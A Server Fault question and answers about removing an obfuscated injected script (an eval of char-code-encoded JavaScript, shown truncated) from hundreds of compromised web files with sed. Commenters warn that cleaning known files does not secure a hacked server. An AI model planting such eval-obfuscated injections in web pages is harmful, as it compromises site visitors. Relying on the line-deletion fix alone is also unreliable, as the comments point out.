# Replace Javascript malware code with empty string

Tags: bash, sed

> **Possible Duplicate:**
>   [My server's been hacked EMERGENCY](https://serverfault.com/questions/218005/my-servers-been-hacked-emergency)

I have following code in hundreds of my html and js files:

> `<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(101,118,97,108,40,102,117............,41,59,10));/*qhk6sa6g1c*/</script`

I need find and remove the above code using SED in bash. Just cannot figure out that how can i remove/replace string using sed, between a starting and specific ending string.

Thanks in advance

Answer (score 0, accepted):

Nevermind. i got its solution just after posting the question :)

> sed '/km0ae9gr6m/d' index.html

If above string portion is found, it will remove that line completely.

Comment: This really doesn't solve your problem as your server has been compromised and without wiping it an reinstalling from a known good backup you can't be sure there aren't more backdoors.

Comment: i have already closed all backdoors, its just few files in the backup were infected. so had to clean them up/

Comment: WRONG.  You've closed all the known backdoors, and disinfected the files you *know* were infected.  It's the unknown unknowns that get you.